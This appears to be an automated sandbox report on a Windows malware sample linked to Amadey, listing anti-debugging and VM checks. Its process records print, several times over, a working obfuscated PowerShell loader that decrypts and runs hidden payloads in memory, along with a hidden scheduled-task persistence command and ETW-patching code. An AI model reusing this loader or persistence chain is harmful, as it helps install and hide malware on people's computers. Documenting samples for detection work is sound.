Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A3D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00A3D420
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A4C508 FindFirstFileExA,	0_2_00A4C508

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Code function: 0_2_00A3F82F VirtualQuery,GetSystemInfo,

0_2_00A3F82F

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: powershell.exe, 00000004.00000002.2095931954.0000000007550000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ld
Source: powershell.exe, 00000005.00000002.2036156838.00000000049CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: wscript.exe, 00000007.00000003.2050241439.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: wscript.exe, 00000007.00000003.2051343769.0000000002F39000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000005.00000002.2035279040.0000000002DA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FMSFT_NetEventVmNetworkAdatper.cdxml
Source: powershell.exe, 00000005.00000002.2036156838.00000000049CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 0000000B.00000002.3308194663.0000000008780000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWt
Source: wscript.exe, 00000008.00000002.2067544754.000001CE38611000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: jcgLYlM4dg.exe, 00000000.00000002.2124170830.0000000003183000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 0000000B.00000002.3308194663.0000000008780000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3308194663.0000000008770000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000005.00000002.2035279040.0000000002DA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMSFT_NetEventVmNetworkAdatper.format.ps1xml
Source: powershell.exe, 00000005.00000002.2036156838.00000000049CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Code function: 0_2_00A40A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00A40A0A

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Code function: 0_2_00A491B0 mov eax, dword ptr fs:[00000030h]

0_2_00A491B0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Code function: 0_2_00A4D1F0 GetProcessHeap,

0_2_00A4D1F0

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A40A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00A40A0A
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A40B9D SetUnhandledExceptionFilter,	0_2_00A40B9D
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A40D8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00A40D8A
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A44FEF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00A44FEF

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell decode and execute

Source: Yara match	File source: amsi32_6640.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_2636.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_576.amsi.csv, type: OTHER

.NET source code references suspicious native API functions

Source: 4.2.powershell.exe.9b90738.4.raw.unpack, Program.cs	Reference to suspicious API methods: VirtualProtect(intPtr, (UIntPtr)(ulong)array.Length, PAGE_EXECUTE_READWRITE, out var lpflOldProtect)
Source: 4.2.powershell.exe.609a748.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Reference to suspicious API methods: LoadLibrary("ntdll.dll")
Source: 4.2.powershell.exe.609a748.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Reference to suspicious API methods: GetProcAddress(hModule, "EtwEventWrite")

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\cmd.exe

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_958_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_958.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_958.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('vgtuugykanih9yhzdnc5etwdm0+akh40igdijn6helq='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('gq/przspw/sfj7e+xuuwra=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $vdega=new-object system.io.memorystream(,$param_var); $adrdx=new-object system.io.memorystream; $hvzlb=new-object system.io.compression.gzipstream($vdega, [io.compression.compressionmode]::decompress); $hvzlb.copyto($adrdx); $hvzlb.dispose(); $vdega.dispose(); $adrdx.dispose(); $adrdx.toarray();}function execute_function($param_var,$param2_var){ $hmqcz=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $yswqp=$hmqcz.entrypoint; $yswqp.invoke($null, $param2_var);}$host.ui.rawui.windowtitle = 'c:\users\user\appdata\local\temp\rarsfx0\amadey.bat';$hexfg=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\appdata\local\temp\rarsfx0\amadey.bat').split([environment]::newline);foreach ($xqpwb in $hexfg) { if ($xqpwb.startswith(':: ')) { $qgdil=$xqpwb.substring(3); break; }}$payloads_var=[string[]]$qgdil.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" register-scheduledtask -taskname 'runtimebroker_startup_958_str' -trigger (new-scheduledtasktrigger -atlogon) -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\startup_str_958.vbs') -settings (new-scheduledtasksettingsset -allowstartifonbatteries -hidden -executiontimelimit 0) -runlevel highest -force
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('vgtuugykanih9yhzdnc5etwdm0+akh40igdijn6helq='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('gq/przspw/sfj7e+xuuwra=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $vdega=new-object system.io.memorystream(,$param_var); $adrdx=new-object system.io.memorystream; $hvzlb=new-object system.io.compression.gzipstream($vdega, [io.compression.compressionmode]::decompress); $hvzlb.copyto($adrdx); $hvzlb.dispose(); $vdega.dispose(); $adrdx.dispose(); $adrdx.toarray();}function execute_function($param_var,$param2_var){ $hmqcz=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $yswqp=$hmqcz.entrypoint; $yswqp.invoke($null, $param2_var);}$host.ui.rawui.windowtitle = 'c:\users\user\appdata\roaming\startup_str_958.bat';$hexfg=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\appdata\roaming\startup_str_958.bat').split([environment]::newline);foreach ($xqpwb in $hexfg) { if ($xqpwb.startswith(':: ')) { $qgdil=$xqpwb.substring(3); break; }}$payloads_var=[string[]]$qgdil.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('vgtuugykanih9yhzdnc5etwdm0+akh40igdijn6helq='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('gq/przspw/sfj7e+xuuwra=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $vdega=new-object system.io.memorystream(,$param_var); $adrdx=new-object system.io.memorystream; $hvzlb=new-object system.io.compression.gzipstream($vdega, [io.compression.compressionmode]::decompress); $hvzlb.copyto($adrdx); $hvzlb.dispose(); $vdega.dispose(); $adrdx.dispose(); $adrdx.toarray();}function execute_function($param_var,$param2_var){ $hmqcz=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $yswqp=$hmqcz.entrypoint; $yswqp.invoke($null, $param2_var);}$host.ui.rawui.windowtitle = 'c:\users\user\appdata\roaming\startup_str_958.bat';$hexfg=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\appdata\roaming\startup_str_958.bat').split([environment]::newline);foreach ($xqpwb in $hexfg) { if ($xqpwb.startswith(':: ')) { $qgdil=$xqpwb.substring(3); break; }}$payloads_var=[string[]]$qgdil.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('vgtuugykanih9yhzdnc5etwdm0+akh40igdijn6helq='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('gq/przspw/sfj7e+xuuwra=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $vdega=new-object system.io.memorystream(,$param_var); $adrdx=new-object system.io.memorystream; $hvzlb=new-object system.io.compression.gzipstream($vdega, [io.compression.compressionmode]::decompress); $hvzlb.copyto($adrdx); $hvzlb.dispose(); $vdega.dispose(); $adrdx.dispose(); $adrdx.toarray();}function execute_function($param_var,$param2_var){ $hmqcz=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $yswqp=$hmqcz.entrypoint; $yswqp.invoke($null, $param2_var);}$host.ui.rawui.windowtitle = 'c:\users\user\appdata\local\temp\rarsfx0\amadey.bat';$hexfg=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\appdata\local\temp\rarsfx0\amadey.bat').split([environment]::newline);foreach ($xqpwb in $hexfg) { if ($xqpwb.startswith(':: ')) { $qgdil=$xqpwb.substring(3); break; }}$payloads_var=[string[]]$qgdil.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" register-scheduledtask -taskname 'runtimebroker_startup_958_str' -trigger (new-scheduledtasktrigger -atlogon) -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\startup_str_958.vbs') -settings (new-scheduledtasksettingsset -allowstartifonbatteries -hidden -executiontimelimit 0) -runlevel highest -force	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('vgtuugykanih9yhzdnc5etwdm0+akh40igdijn6helq='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('gq/przspw/sfj7e+xuuwra=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $vdega=new-object system.io.memorystream(,$param_var); $adrdx=new-object system.io.memorystream; $hvzlb=new-object system.io.compression.gzipstream($vdega, [io.compression.compressionmode]::decompress); $hvzlb.copyto($adrdx); $hvzlb.dispose(); $vdega.dispose(); $adrdx.dispose(); $adrdx.toarray();}function execute_function($param_var,$param2_var){ $hmqcz=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $yswqp=$hmqcz.entrypoint; $yswqp.invoke($null, $param2_var);}$host.ui.rawui.windowtitle = 'c:\users\user\appdata\roaming\startup_str_958.bat';$hexfg=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\appdata\roaming\startup_str_958.bat').split([environment]::newline);foreach ($xqpwb in $hexfg) { if ($xqpwb.startswith(':: ')) { $qgdil=$xqpwb.substring(3); break; }}$payloads_var=[string[]]$qgdil.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('vgtuugykanih9yhzdnc5etwdm0+akh40igdijn6helq='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('gq/przspw/sfj7e+xuuwra=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $vdega=new-object system.io.memorystream(,$param_var); $adrdx=new-object system.io.memorystream; $hvzlb=new-object system.io.compression.gzipstream($vdega, [io.compression.compressionmode]::decompress); $hvzlb.copyto($adrdx); $hvzlb.dispose(); $vdega.dispose(); $adrdx.dispose(); $adrdx.toarray();}function execute_function($param_var,$param2_var){ $hmqcz=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $yswqp=$hmqcz.entrypoint; $yswqp.invoke($null, $param2_var);}$host.ui.rawui.windowtitle = 'c:\users\user\appdata\roaming\startup_str_958.bat';$hexfg=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\appdata\roaming\startup_str_958.bat').split([environment]::newline);foreach ($xqpwb in $hexfg) { if ($xqpwb.startswith(':: ')) { $qgdil=$xqpwb.substring(3); break; }}$payloads_var=[string[]]$qgdil.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Code function: 0_2_00A3BEFF SetEntriesInAclW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateDirectoryW,LocalFree,

0_2_00A3BEFF

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Code function: 0_2_00A40826 cpuid

0_2_00A40826

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_00A3C093

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
